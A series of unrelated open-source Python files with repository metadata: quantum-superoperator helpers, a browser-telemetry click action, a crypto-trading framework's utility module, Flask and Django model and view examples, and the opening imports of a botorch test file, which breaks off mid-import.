    Eliminate subsystems that have been collapsed to only one state due to
a projection.
"""
return [d for d in dims if d != 1]
def sprepost(A, B):
"""
Superoperator formed from pre-multiplication by A and post-multiplication
by B.
Parameters
----------
A : Qobj or QobjEvo
Quantum operator for pre-multiplication.
B : Qobj or QobjEvo
Quantum operator for post-multiplication.
Returns
-------
super : Qobj or QobjEvo
Superoperator formed from input quantum objects.
"""
# To avoid circular dependencies
from .cy.qobjevo import QobjEvo
if (isinstance(A, QobjEvo) or isinstance(B, QobjEvo)):
return spre(A) * spost(B)
dims = [[_drop_projected_dims(A.dims[0]),
_drop_projected_dims(B.dims[1])],
[_drop_projected_dims(A.dims[1]),
_drop_projected_dims(B.dims[0])]]
return Qobj(_data.kron_transpose(B.data, A.data),
dims=dims,
type='super',
superrep='super',
isherm=A._isherm and B._isherm,
copy=False)
def reshuffle(q_oper):
"""
Column-reshuffles a ``type="super"`` Qobj.
"""
if q_oper.type not in ('super', 'operator-ket'):
raise TypeError("Reshuffling is only supported on type='super' "
"or type='operator-ket'.")
# How many indices are there, and how many subsystems can we decompose
# each index into?
n_indices = len(q_oper.dims[0])
n_subsystems = len(q_oper.dims[0][0])
# Generate a list of lists (lol) that represents the permutation order we
# need. It's easiest to do so if we make an array, then turn it into a lol
# by using map(list, ...). That array is generated by using reshape and
# transpose to turn an array like [a, b, a, b, ..., a, b] into one like
# [a, a, ..., a, b, b, ..., b].
perm_idxs = map(list,
np.arange(n_subsystems * n_indices)[
np.arange(n_subsystems * n_indices).reshape(
(n_indices, n_subsystems)).T.flatten()
].reshape((n_subsystems, n_indices))
)
return q_oper.permute(list(perm_idxs))
|
3f23fafc812d745f5548aad6195b20e15230e3d4
|
3a6a211ea0d32405497fbd6486c490bb147e25f9
|
/telemetry/telemetry/internal/actions/javascript_click.py
|
6fe69707cc515847ed652d8da8bcb9bba618b6d5
|
[
"BSD-3-Clause"
] |
permissive
|
catapult-project/catapult
|
e2cbdd5eb89f3b1492fc8752494e62ea1df4bae0
|
53102de187a48ac2cfc241fef54dcbc29c453a8e
|
refs/heads/main
| 2021-05-25T07:37:22.832505
| 2021-05-24T08:01:49
| 2021-05-25T06:07:38
| 33,947,548
| 2,032
| 742
|
BSD-3-Clause
| 2022-08-26T16:01:18
| 2015-04-14T17:49:05
|
HTML
|
UTF-8
|
Python
| false
| false
| 710
|
py
|
javascript_click.py
|
# Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
from __future__ import absolute_import
from telemetry.internal.actions import page_action
class ClickElementAction(page_action.ElementPageAction):
def RunAction(self, tab):
code = '''
function(element, errorMsg) {
if (!element) {
throw Error('Cannot find element: ' + errorMsg);
}
element.click();
}'''
    # A click handler that plays media or requests fullscreen may not take
    # effect without user_gesture set to True.
self.EvaluateCallback(tab, code, user_gesture=True)
|
cea1d4ff649fd4a0dbadde515b37d2e5c839e921
|
b43e0384ec4bfacec2571a2bb41ce563267db449
|
/jesse/helpers.py
|
eb5fc27b42024adcd6ece80ea7d05bf1027af2f7
|
[
"MIT"
] |
permissive
|
jesse-ai/jesse
|
55b73448b767492a20f8bc56c28306a1a24f8599
|
fadb03b5fcc06f0655c6a5d877435fb872a97c5e
|
refs/heads/master
| 2023-08-24T15:28:52.875208
| 2023-08-24T13:53:31
| 2023-08-24T13:53:31
| 156,847,937
| 5,259
| 722
|
MIT
| 2023-09-10T13:51:26
| 2018-11-09T10:38:44
|
Python
|
UTF-8
|
Python
| false
| false
| 28,324
|
py
|
helpers.py
|
import hashlib
import math
import os
import random
import string
import sys
import uuid
from typing import List, Tuple, Union, Any, Optional
from pprint import pprint
import arrow
import click
import numpy
import numpy as np
CACHED_CONFIG = dict()
def app_currency() -> str:
from jesse.routes import router
return quote_asset(router.routes[0].symbol)
def app_mode() -> str:
from jesse.config import config
return config['app']['trading_mode']
def arrow_to_timestamp(arrow_time: arrow.arrow.Arrow) -> int:
return arrow_time.int_timestamp * 1000
def base_asset(symbol: str) -> str:
return symbol.split('-')[0]
def binary_search(arr: list, item) -> int:
"""
performs a simple binary search on a sorted list
:param arr: list
:param item:
:return: int
"""
from bisect import bisect_left
i = bisect_left(arr, item)
if i != len(arr) and arr[i] == item:
return i
else:
return -1
def class_iter(Class):
return (value for variable, value in vars(Class).items() if
not callable(getattr(Class, variable)) and not variable.startswith("__"))
def clean_orderbook_list(arr) -> List[List[float]]:
return [[float(i[0]), float(i[1])] for i in arr]
def color(msg_text: str, msg_color: str) -> str:
    if not msg_text:
        return ''
    supported = {'black', 'red', 'green', 'yellow', 'blue', 'magenta', 'cyan', 'white', 'gray'}
    if msg_color not in supported:
        raise ValueError('unsupported color')
    # 'gray' is rendered with click's 'white', matching the original mapping
    fg = 'white' if msg_color == 'gray' else msg_color
    return click.style(msg_text, fg=fg)
def convert_number(old_max: float, old_min: float, new_max: float, new_min: float, old_value: float) -> float:
"""
convert a number from one range (ex 40-119) to another
range (ex 0-30) while keeping the ratio.
"""
# validation
if old_value > old_max or old_value < old_min:
raise ValueError(f'old_value:{old_value} must be within the range. {old_min}-{old_max}')
old_range = (old_max - old_min)
new_range = (new_max - new_min)
return (((old_value - old_min) * new_range) / old_range) + new_min
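# Worked example (values chosen for illustration): mapping the range 40-119
# onto 0-30 sends the old endpoints to the new endpoints.
#   convert_number(119, 40, 30, 0, 40)   # -> 0.0
#   convert_number(119, 40, 30, 0, 119)  # -> 30.0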
def dashless_symbol(symbol: str) -> str:
return symbol.replace("-", "")
def dashy_symbol(symbol: str) -> str:
# if already has '-' in symbol, return symbol
if '-' in symbol:
return symbol
from jesse.config import config
for s in config['app']['considering_symbols']:
compare_symbol = dashless_symbol(s)
if compare_symbol == symbol:
return s
if len(symbol) > 7 and symbol.endswith('SUSDT'):
# ex: SETHSUSDT => SETH-SUSDT
return symbol[:-5] + '-' + symbol[-5:]
return f"{symbol[0:3]}-{symbol[3:]}"
def date_diff_in_days(date1: arrow.arrow.Arrow, date2: arrow.arrow.Arrow) -> int:
if type(date1) is not arrow.arrow.Arrow or type(
date2) is not arrow.arrow.Arrow:
raise TypeError('dates must be Arrow instances')
dif = date2 - date1
return abs(dif.days)
def date_to_timestamp(date: str) -> int:
"""
converts date string into timestamp. "2015-08-01" => 1438387200000
:param date: str
:return: int
"""
return arrow_to_timestamp(arrow.get(date, 'YYYY-MM-DD'))
def dna_to_hp(strategy_hp, dna: str):
hp = {}
for gene, h in zip(dna, strategy_hp):
if h['type'] is int:
decoded_gene = int(
round(
convert_number(119, 40, h['max'], h['min'], ord(gene))
)
)
elif h['type'] is float:
decoded_gene = convert_number(119, 40, h['max'], h['min'], ord(gene))
else:
raise TypeError('Only int and float types are implemented')
hp[h['name']] = decoded_gene
return hp
def dump_exception() -> None:
"""
a useful debugging helper
"""
import traceback
print(traceback.format_exc())
terminate_app()
def estimate_average_price(order_qty: float, order_price: float, current_qty: float,
current_entry_price: float) -> float:
"""Estimates the new entry price for the position.
This is used after having a new order and updating the currently holding position.
Arguments:
order_qty {float} -- qty of the new order
order_price {float} -- price of the new order
current_qty {float} -- current(pre-calculation) qty
current_entry_price {float} -- current(pre-calculation) entry price
Returns:
float -- the new/averaged entry price
"""
return (abs(order_qty) * order_price + abs(current_qty) *
current_entry_price) / (abs(order_qty) + abs(current_qty))
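# Worked example: holding 2 units entered at 100 and adding 1 unit at 130
# moves the averaged entry price to (1*130 + 2*100) / 3:
#   estimate_average_price(1, 130, 2, 100)  # -> 110.0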
def estimate_PNL(qty: float, entry_price: float, exit_price: float, trade_type: str, trading_fee: float = 0) -> float:
qty = abs(qty)
profit = qty * (exit_price - entry_price)
if trade_type == 'short':
profit *= -1
fee = trading_fee * qty * (entry_price + exit_price)
return profit - fee
def estimate_PNL_percentage(qty: float, entry_price: float, exit_price: float, trade_type: str) -> float:
qty = abs(qty)
profit = qty * (exit_price - entry_price)
if trade_type == 'short':
profit *= -1
return (profit / (qty * entry_price)) * 100
def file_exists(path: str) -> bool:
return os.path.isfile(path)
def clear_file(path: str) -> None:
with open(path, 'w') as f:
f.write('')
def make_directory(path: str) -> None:
if not os.path.exists(path):
os.makedirs(path)
def floor_with_precision(num: float, precision: int = 0) -> float:
temp = 10 ** precision
return math.floor(num * temp) / temp
def format_currency(num: float) -> str:
return f'{num:,}'
def generate_unique_id() -> str:
return str(uuid.uuid4())
def get_arrow(timestamp: int) -> arrow.arrow.Arrow:
return timestamp_to_arrow(timestamp)
def get_candle_source(candles: np.ndarray, source_type: str = "close") -> np.ndarray:
"""
Returns the candles corresponding the selected type.
:param candles: np.ndarray
:param source_type: string
:return: np.ndarray
"""
if source_type == "close":
return candles[:, 2]
elif source_type == "high":
return candles[:, 3]
elif source_type == "low":
return candles[:, 4]
elif source_type == "open":
return candles[:, 1]
elif source_type == "volume":
return candles[:, 5]
elif source_type == "hl2":
return (candles[:, 3] + candles[:, 4]) / 2
elif source_type == "hlc3":
return (candles[:, 3] + candles[:, 4] + candles[:, 2]) / 3
elif source_type == "ohlc4":
return (candles[:, 1] + candles[:, 3] + candles[:, 4] + candles[:, 2]) / 4
else:
raise ValueError('type string not recognised')
def get_config(keys: str, default: Any = None) -> Any:
"""
Gets keys as a single string separated with "." and returns value.
Also accepts a default value so that the app would work even if
the required config value is missing from config.py file.
Example: get_config('env.logging.order_submission', True)
:param keys: str
:param default: None
:return:
"""
    if not keys:
        raise ValueError('keys string cannot be empty')
if is_unit_testing() or keys not in CACHED_CONFIG:
if os.environ.get(keys.upper().replace(".", "_").replace(" ", "_")) is not None:
CACHED_CONFIG[keys] = os.environ.get(keys.upper().replace(".", "_").replace(" ", "_"))
else:
from functools import reduce
from jesse.config import config
CACHED_CONFIG[keys] = reduce(lambda d, k: d.get(k, default) if isinstance(d, dict) else default,
keys.split("."), config)
return CACHED_CONFIG[keys]
def get_store():
from jesse.store import store
return store
def get_strategy_class(strategy_name: str):
from pydoc import locate
if not is_unit_testing():
return locate(f'strategies.{strategy_name}.{strategy_name}')
path = sys.path[0]
# live plugin
if path.endswith('jesse-live'):
strategy_dir = f'tests.strategies.{strategy_name}.{strategy_name}'
# main framework
else:
strategy_dir = f'jesse.strategies.{strategy_name}.{strategy_name}'
return locate(strategy_dir)
def insecure_hash(msg: str) -> str:
return hashlib.md5(msg.encode()).hexdigest()
def insert_list(index: int, item, arr: list) -> list:
"""
helper to insert an item in a Python List without removing the item
"""
if index == -1:
return arr + [item]
return arr[:index] + [item] + arr[index:]
def is_backtesting() -> bool:
from jesse.config import config
return config['app']['trading_mode'] == 'backtest'
def is_collecting_data() -> bool:
from jesse.config import config
return config['app']['trading_mode'] == 'collect'
def is_debuggable(debug_item) -> bool:
from jesse.config import config
return is_debugging() and config['env']['logging'][debug_item]
def is_debugging() -> bool:
from jesse.config import config
return config['app']['debug_mode']
def is_importing_candles() -> bool:
from jesse.config import config
return config['app']['trading_mode'] == 'candles'
def is_live() -> bool:
return is_livetrading() or is_paper_trading()
def is_livetrading() -> bool:
from jesse.config import config
return config['app']['trading_mode'] == 'livetrade'
def is_optimizing() -> bool:
from jesse.config import config
return config['app']['trading_mode'] == 'optimize'
def is_paper_trading() -> bool:
from jesse.config import config
return config['app']['trading_mode'] == 'papertrade'
def is_unit_testing() -> bool:
from jesse.config import config
# config['app']['is_unit_testing'] is only set in the live plugin unit tests
return "pytest" in sys.modules or config['app']['is_unit_testing']
def is_valid_uuid(uuid_to_test: str, version: int = 4) -> bool:
try:
uuid_obj = uuid.UUID(uuid_to_test, version=version)
except ValueError:
return False
return str(uuid_obj) == uuid_to_test
def key(exchange: str, symbol: str, timeframe: str = None):
if timeframe is None:
return f'{exchange}-{symbol}'
return f'{exchange}-{symbol}-{timeframe}'
def max_timeframe(timeframes_list: list) -> str:
    from jesse.enums import timeframes
    # ordered from the largest supported timeframe down to the smallest
    ordered = (
        timeframes.DAY_1, timeframes.HOUR_12, timeframes.HOUR_8,
        timeframes.HOUR_6, timeframes.HOUR_4, timeframes.HOUR_3,
        timeframes.HOUR_2, timeframes.HOUR_1, timeframes.MINUTE_45,
        timeframes.MINUTE_30, timeframes.MINUTE_15, timeframes.MINUTE_5,
        timeframes.MINUTE_3,
    )
    for timeframe in ordered:
        if timeframe in timeframes_list:
            return timeframe
    return timeframes.MINUTE_1
def normalize(x: float, x_min: float, x_max: float) -> float:
"""
Rescaling data to have values between 0 and 1
"""
return (x - x_min) / (x_max - x_min)
def now(force_fresh=False) -> int:
"""
    Always returns the current time in milliseconds, but with second-level resolution (the sub-second part is truncated)
"""
return now_to_timestamp(force_fresh)
def now_to_timestamp(force_fresh=False) -> int:
if not force_fresh and (not (is_live() or is_collecting_data() or is_importing_candles())):
from jesse.store import store
return store.app.time
return arrow.utcnow().int_timestamp * 1000
def current_1m_candle_timestamp():
return arrow.utcnow().floor('minute').int_timestamp * 1000
def np_ffill(arr: np.ndarray, axis: int = 0) -> np.ndarray:
    """
    Forward-fills NaN values along the given axis: each NaN is replaced by the
    most recent non-NaN value preceding it along that axis.
    """
idx_shape = tuple([slice(None)] + [np.newaxis] * (len(arr.shape) - axis - 1))
idx = np.where(~np.isnan(arr), np.arange(arr.shape[axis])[idx_shape], 0)
np.maximum.accumulate(idx, axis=axis, out=idx)
slc = [
np.arange(k)[
tuple(
slice(None) if dim == i else np.newaxis
for dim in range(len(arr.shape))
)
]
for i, k in enumerate(arr.shape)
]
slc[axis] = idx
return arr[tuple(slc)]
def np_shift(arr: np.ndarray, num: int, fill_value=0) -> np.ndarray:
result = np.empty_like(arr)
if num > 0:
result[:num] = fill_value
result[num:] = arr[:-num]
elif num < 0:
result[num:] = fill_value
result[:num] = arr[-num:]
else:
result[:] = arr
return result
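# Worked example:
#   np_shift(np.array([1, 2, 3, 4]), 2)                 # -> array([0, 0, 1, 2])
#   np_shift(np.array([1, 2, 3, 4]), -1, fill_value=9)  # -> array([2, 3, 4, 9])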
def opposite_side(s: str) -> str:
from jesse.enums import sides
if s == sides.BUY:
return sides.SELL
elif s == sides.SELL:
return sides.BUY
else:
raise ValueError(f'{s} is not a valid input for side')
def opposite_type(t: str) -> str:
from jesse.enums import trade_types
if t == trade_types.LONG:
return trade_types.SHORT
if t == trade_types.SHORT:
return trade_types.LONG
raise ValueError('unsupported type')
def orderbook_insertion_index_search(arr, target, ascending: bool = True) -> Tuple[bool, int]:
    # ``target`` is an orderbook row; its first element is the price to search for
    target = target[0]
lower = 0
upper = len(arr)
while lower < upper:
x = lower + (upper - lower) // 2
val = arr[x][0]
if ascending:
if target == val:
return True, x
elif target > val:
if lower == x:
return False, lower + 1
lower = x
elif target < val:
if lower == x:
return False, lower
upper = x
elif target == val:
return True, x
elif target < val:
if lower == x:
return False, lower + 1
lower = x
elif target > val:
if lower == x:
return False, lower
upper = x
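# Usage sketch (illustrative): given an ascending orderbook of [price, qty]
# rows, returns (found, index) where `index` is the insertion point that
# keeps the book sorted. The sample book is an assumption for demonstration.
_book = [[100.0, 1.0], [101.0, 2.0], [103.0, 0.5]]
assert orderbook_insertion_index_search(_book, [101.0, 1.0]) == (True, 1)
assert orderbook_insertion_index_search(_book, [102.0, 1.0]) == (False, 2)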
def orderbook_trim_price(p: float, ascending: bool, unit: float) -> float:
if ascending:
trimmed = np.ceil(p / unit) * unit
if math.log10(unit) < 0:
trimmed = round(trimmed, abs(int(math.log10(unit))))
return p if trimmed == p + unit else trimmed
trimmed = np.ceil(p / unit) * unit - unit
if math.log10(unit) < 0:
trimmed = round(trimmed, abs(int(math.log10(unit))))
return p if trimmed == p - unit else trimmed
def prepare_qty(qty: float, side: str) -> float:
if side.lower() in ('sell', 'short'):
return -abs(qty)
elif side.lower() in ('buy', 'long'):
return abs(qty)
elif side.lower() == 'close':
return 0.0
else:
raise ValueError(f'{side} is not a valid input')
def python_version() -> tuple:
return sys.version_info[:2]
def quote_asset(symbol: str) -> str:
try:
return symbol.split('-')[1]
except IndexError:
from jesse.exceptions import InvalidRoutes
raise InvalidRoutes(f"The symbol format is incorrect. Correct example: 'BTC-USDT'. Yours is '{symbol}'")
def random_str(num_characters: int = 8) -> str:
return ''.join(random.choice(string.ascii_letters) for _ in range(num_characters))
def readable_duration(seconds: int, granularity: int = 2) -> str:
intervals = (
('weeks', 604800), # 60 * 60 * 24 * 7
('days', 86400), # 60 * 60 * 24
('hours', 3600), # 60 * 60
('minutes', 60),
('seconds', 1),
)
result = []
seconds = int(seconds)
for name, count in intervals:
value = seconds // count
if value:
seconds -= value * count
if value == 1:
name = name.rstrip('s')
result.append(f"{value} {name}")
return ', '.join(result[:granularity])
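# Usage sketch (illustrative): durations are broken into at most `granularity`
# units, largest first. The input is an assumption for demonstration.
assert readable_duration(3905) == '1 hour, 5 minutes'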
def relative_to_absolute(path: str) -> str:
return os.path.abspath(path)
def round_or_none(x: Union[float, None], digits: int = 0) -> Optional[float]:
"""
Rounds a number to a certain number of digits or returns None if the number is None
"""
if x is None:
return None
return round(x, digits)
def round_price_for_live_mode(price, precision: int) -> Union[float, np.ndarray]:
"""
Rounds price(s) based on exchange requirements
:param price: float
:param precision: int
    :return: float | np.ndarray
"""
return np.round(price, precision)
def round_qty_for_live_mode(roundable_qty: float, precision: int) -> Union[float, np.ndarray]:
"""
Rounds qty(s) based on exchange requirements
    :param roundable_qty: float | np.ndarray
    :param precision: int
    :return: float | np.ndarray
    """
    input_type = type(roundable_qty)
    # if roundable_qty is a scalar, convert it to an np.ndarray
    if not isinstance(roundable_qty, np.ndarray):
        roundable_qty = np.array([roundable_qty])
    # for qty, rounding down is important to prevent InsufficientMargin errors
rounded = round_decimals_down(roundable_qty, precision)
for index, q in enumerate(rounded):
# if the rounded value is 0, make it the minimum possible value
if q == 0.0:
            # if the precision is greater than or equal to 0 (for numbers like 2, 0.2, 0.02)
if precision >= 0:
rounded[index] = 1 / 10 ** precision
else: # for numbers like 20, 200, 2000
raise ValueError('qty is too small')
if input_type in [float, np.float64]:
return float(rounded[0])
return rounded
def round_decimals_down(number: Union[np.ndarray, float], decimals: int = 2) -> float:
"""
Returns a value rounded down to a specific number of decimal places.
"""
if not isinstance(decimals, int):
raise TypeError("decimal places must be an integer")
elif decimals == 0:
return np.floor(number)
elif decimals > 0:
factor = 10 ** decimals
return np.floor(number * factor) / factor
elif decimals < 0:
        # for example, with decimals = -2 we round down to the nearest 100: 1234 becomes 1200
factor = 10 ** (decimals * -1)
return np.floor(number / factor) * factor
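# Usage sketch (illustrative): round_decimals_down always floors at the given
# precision (including negative precision), and round_qty_for_live_mode bumps
# a qty that would floor to 0 up to the minimum step instead. Values below
# are assumptions for demonstration.
assert round_decimals_down(1234.0, -2) == 1200.0
assert round_qty_for_live_mode(1.2345, 2) == 1.23
assert round_qty_for_live_mode(0.0004, 3) == 0.001  # too small -> minimum step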
def same_length(bigger: np.ndarray, shorter: np.ndarray) -> np.ndarray:
return np.concatenate((np.full((bigger.shape[0] - shorter.shape[0]), np.nan), shorter))
def secure_hash(msg: str) -> str:
return hashlib.sha256(msg.encode()).hexdigest()
def should_execute_silently() -> bool:
return is_optimizing() or is_unit_testing()
def side_to_type(s: str) -> str:
from jesse.enums import trade_types, sides
# make sure string is lowercase
s = s.lower()
if s == sides.BUY:
return trade_types.LONG
if s == sides.SELL:
return trade_types.SHORT
raise ValueError
def string_after_character(s: str, character: str) -> str:
try:
return s.split(character, 1)[1]
except IndexError:
return None
def slice_candles(candles: np.ndarray, sequential: bool) -> np.ndarray:
warmup_candles_num = get_config('env.data.warmup_candles_num', 240)
if not sequential and candles.shape[0] > warmup_candles_num:
candles = candles[-warmup_candles_num:]
return candles
def style(msg_text: str, msg_style: str) -> str:
if msg_style is None:
return msg_text
if msg_style.lower() in ['bold', 'b']:
return click.style(msg_text, bold=True)
if msg_style.lower() in ['underline', 'u']:
return click.style(msg_text, underline=True)
raise ValueError('unsupported style')
def terminate_app() -> None:
# close the database
from jesse.services.db import database
database.close_connection()
# disconnect python from the OS
os._exit(1)
def error(msg: str, force_print: bool = False) -> None:
# send notifications if it's a live session
if is_live():
from jesse.services import logger
logger.error(msg)
if force_print:
_print_error(msg)
else:
_print_error(msg)
def _print_error(msg: str) -> None:
print('\n')
print(color('========== critical error =========='.upper(), 'red'))
print(color(msg, 'red'))
def timeframe_to_one_minutes(timeframe: str) -> int:
from jesse.enums import timeframes
from jesse.exceptions import InvalidTimeframe
dic = {
timeframes.MINUTE_1: 1,
timeframes.MINUTE_3: 3,
timeframes.MINUTE_5: 5,
timeframes.MINUTE_15: 15,
timeframes.MINUTE_30: 30,
timeframes.MINUTE_45: 45,
timeframes.HOUR_1: 60,
timeframes.HOUR_2: 60 * 2,
timeframes.HOUR_3: 60 * 3,
timeframes.HOUR_4: 60 * 4,
timeframes.HOUR_6: 60 * 6,
timeframes.HOUR_8: 60 * 8,
timeframes.HOUR_12: 60 * 12,
timeframes.DAY_1: 60 * 24,
timeframes.DAY_3: 60 * 24 * 3,
timeframes.WEEK_1: 60 * 24 * 7,
timeframes.MONTH_1: 60 * 24 * 30,
}
try:
return dic[timeframe]
except KeyError:
        all_timeframes = list(class_iter(timeframes))
raise InvalidTimeframe(
f'Timeframe "{timeframe}" is invalid. Supported timeframes are {", ".join(all_timeframes)}.')
def timestamp_to_arrow(timestamp: int) -> arrow.arrow.Arrow:
return arrow.get(timestamp / 1000)
def timestamp_to_date(timestamp: int) -> str:
return str(arrow.get(timestamp / 1000))[:10]
def timestamp_to_time(timestamp: int) -> str:
return str(arrow.get(timestamp / 1000))
def timestamp_to_iso8601(timestamp: int) -> str:
    # example: 1609804800000 => '2021-01-05T00:00:00+00:00'
return arrow.get(timestamp / 1000).isoformat()
def iso8601_to_timestamp(iso8601: str) -> int:
    # example: '2021-01-05T00:00:00.000Z' -> 1609804800000
return int(arrow.get(iso8601, 'YYYY-MM-DDTHH:mm:ss.SSSZ').datetime.timestamp()) * 1000
def today_to_timestamp() -> int:
"""
    returns the timestamp (in milliseconds) of the beginning of today (UTC)
:return: int
"""
return arrow.utcnow().floor('day').int_timestamp * 1000
def type_to_side(t: str) -> str:
from jesse.enums import trade_types, sides
if t == trade_types.LONG:
return sides.BUY
if t == trade_types.SHORT:
return sides.SELL
raise ValueError(f'unsupported type: "{t}". Only "long" and "short" are supported.')
def unique_list(arr) -> list:
"""
returns a unique version of the list while keeping its order
:param arr: list | tuple
:return: list
"""
seen = set()
seen_add = seen.add
return [x for x in arr if not (x in seen or seen_add(x))]
def closing_side(position_type: str) -> str:
if position_type.lower() == 'long':
return 'sell'
elif position_type.lower() == 'short':
return 'buy'
else:
raise ValueError(f'Value entered for position_type ({position_type}) is not valid')
def merge_dicts(d1: dict, d2: dict) -> dict:
"""
Merges nested dictionaries
:param d1: dict
:param d2: dict
:return: dict
"""
def inner(dict1, dict2):
for k in set(dict1.keys()).union(dict2.keys()):
if k in dict1 and k in dict2:
if isinstance(dict1[k], dict) and isinstance(dict2[k], dict):
yield k, dict(merge_dicts(dict1[k], dict2[k]))
else:
yield k, dict2[k]
elif k in dict1:
yield k, dict1[k]
else:
yield k, dict2[k]
return dict(inner(d1, d2))
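# Usage sketch (illustrative): nested dicts are merged recursively; for
# conflicting non-dict values, d2 wins. The inputs are assumptions.
assert merge_dicts(
    {'a': 1, 'b': {'x': 1, 'y': 2}},
    {'b': {'y': 3}, 'c': 4},
) == {'a': 1, 'b': {'x': 1, 'y': 3}, 'c': 4}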
def computer_name():
import platform
return platform.node()
def validate_response(response):
if response.status_code != 200:
err_msg = f"[{response.status_code}]: {response.json()['message']}\nPlease contact us at support@jesse.trade if this is unexpected."
if response.status_code not in [401, 403]:
raise ConnectionError(err_msg)
error(err_msg, force_print=True)
terminate_app()
def get_session_id():
from jesse.store import store
if store.app.session_id == '':
store.app.session_id = generate_unique_id()
return store.app.session_id
def get_pid():
return os.getpid()
def is_jesse_project():
ls = os.listdir('.')
return 'strategies' in ls and 'storage' in ls
def dd(item):
"""
Dump and Die but pretty: used for debugging when developing Jesse
"""
dump(item)
terminate_app()
def dump(*item):
"""
Dump object in pretty format: used for debugging when developing Jesse
"""
if len(item) == 1:
item = item[0]
print(
color('\n========= Debugging Value =========='.upper(), 'yellow')
)
pprint(item)
print(
color('====================================\n', 'yellow')
)
def float_or_none(item):
"""
Return the float of the value if it's not None
"""
if item is None or item == '':
return None
else:
return float(item)
def str_or_none(item, encoding='utf-8'):
"""
Return the str of the value if it's not None
"""
if item is None:
return None
else:
# return item if it's str, if not, decode it using encoding
if isinstance(item, str):
return item
        if type(item) == np.float64:
return str(item)
try:
return str(item, encoding)
except TypeError:
return str(item)
def cpu_cores_count():
from multiprocessing import cpu_count
return cpu_count()
# a function that converts name to env_name. Example: 'Testnet Binance Futures' into 'TESTNET_BINANCE_FUTURES'
def convert_to_env_name(name: str) -> str:
return name.replace(' ', '_').upper()
def is_notebook():
try:
shell = get_ipython().__class__.__name__
# Jupyter notebook or qtconsole
if shell == 'ZMQInteractiveShell':
return True
elif shell == 'TerminalInteractiveShell':
# Terminal running IPython
return False
else:
# Other type (?)
return False
except NameError:
# Probably standard Python interpreter
return False
def get_os() -> str:
import platform
if platform.system() == 'Darwin':
return 'mac'
elif platform.system() == 'Linux':
return 'linux'
elif platform.system() == 'Windows':
return 'windows'
else:
raise NotImplementedError(f'Unsupported OS: "{platform.system()}"')
# a function that returns boolean whether or not the code is being executed inside a docker container
def is_docker() -> bool:
import os
return os.path.exists('/.dockerenv')
def clear_output():
if is_notebook():
from IPython.display import clear_output
clear_output(wait=True)
else:
click.clear()
def get_class_name(cls):
# if it's a string, return it
if isinstance(cls, str):
return cls
# else, return the class name
return cls.__name__
def next_candle_timestamp(candle: np.ndarray, timeframe: str) -> int:
return candle[0] + timeframe_to_one_minutes(timeframe) * 60_000
def get_candle_start_timestamp_based_on_timeframe(timeframe: str, num_candles_to_fetch: int) -> int:
one_min_count = timeframe_to_one_minutes(timeframe)
finish_date = now(force_fresh=True)
return finish_date - (num_candles_to_fetch * one_min_count * 60_000)
|
ea884c0f7e65b9d06f63cbbed69571c47abf862f
|
6dfc23ef65e5943712340ef2b4b648cc25ea1fad
|
/2022/01/03/Creating One-To-Many Relationships in Flask-SQLAlchemy/one_to_many_example/app.py
|
35befc58a45a94708fb1c0abda0ff9de76e704ad
|
[
"Unlicense"
] |
permissive
|
PrettyPrinted/youtube_video_code
|
6d265c910de18d780cdb99f7ea11b8b963929dc2
|
5654e5feba854d3b41b8dd75218e0221408e7831
|
refs/heads/master
| 2023-09-04T21:28:57.386174
| 2023-08-11T07:07:45
| 2023-08-11T07:07:45
| 186,743,986
| 698
| 2,347
|
Unlicense
| 2022-10-06T04:06:56
| 2019-05-15T03:40:45
|
HTML
|
UTF-8
|
Python
| false
| false
| 627
|
py
|
app.py
|
from flask import Flask
from flask_sqlalchemy import SQLAlchemy
app = Flask(__name__)
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///db.sqlite3'
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
db = SQLAlchemy(app)
class Owner(db.Model):
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(20))
address = db.Column(db.String(100))
pets = db.relationship('Pet', backref='owner')
class Pet(db.Model):
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(20))
age = db.Column(db.Integer)
owner_id = db.Column(db.Integer, db.ForeignKey('owner.id'))
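# Usage sketch (illustrative, not part of the original file): exercising the
# one-to-many relationship. The names and values below are assumptions.
with app.app_context():
    db.create_all()
    anthony = Owner(name='Anthony', address='123 Main St')
    spot = Pet(name='Spot', age=3, owner=anthony)
    db.session.add_all([anthony, spot])
    db.session.commit()
    assert spot.owner is anthony  # backref from Pet back to its Owner
    assert spot in anthony.pets   # relationship from Owner to its Pets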
|
ac856cb469868e6bfd92c040245a4b1218c1e388
|
db57665fbc6c840b3e0b68d7a2ae6997d2bbb7f3
|
/ch11-books/books/views.py
|
5a9e8f2eda506bca213e8184b111e5f911fd0657
|
[
"MIT"
] |
permissive
|
wsvincent/djangoforprofessionals
|
4a9de4a8db8017bd704df2129d5a608ed8270380
|
bb17b5115089140c2ae8a3ef5b27de083851558d
|
refs/heads/main
| 2023-08-23T16:21:43.555596
| 2022-06-02T13:52:11
| 2022-06-02T13:52:11
| 178,557,837
| 597
| 318
|
MIT
| 2023-08-05T00:51:17
| 2019-03-30T12:49:00
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 354
|
py
|
views.py
|
from django.views.generic import ListView, DetailView # new
from .models import Book
class BookListView(ListView):
model = Book
context_object_name = "book_list"
template_name = "books/book_list.html"
class BookDetailView(DetailView):
model = Book
context_object_name = "book" # new
template_name = "books/book_detail.html"
|
0a2c1c64d6437a6fa314da43e6dd4c50f8e7464c
|
c058f51b99f91faebf27183b2b579e9f96e0d8f5
|
/test/utils/multi_objective/box_decompositions/test_utils.py
|
bf6b8edfe2deda4a9f730eb05e4e2891df51f586
|
[
"MIT"
] |
permissive
|
pytorch/botorch
|
255d62f698cc615c750e9343c278a63c7e96a586
|
4cc5ed59b2e8a9c780f786830c548e05cc74d53c
|
refs/heads/main
| 2023-08-22T15:23:51.071048
| 2023-08-22T05:30:38
| 2023-08-22T05:30:38
| 142,940,093
| 2,891
| 373
|
MIT
| 2023-09-13T00:16:13
| 2018-07-30T23:59:57
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 14,167
|
py
|
test_utils.py
|
#! /usr/bin/env python3
# Copyright (c) Meta Platforms, Inc. and affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
from __future__ import annotations
import torch
from botorch.exceptions.errors import BotorchTensorDimensionError, UnsupportedError
from botorch.utils.multi_objective.box_decompositions.utils import (
_expand_ref_point,
_pad_batch_pareto_frontier,
compute_dominated_hypercell_bounds_2d,
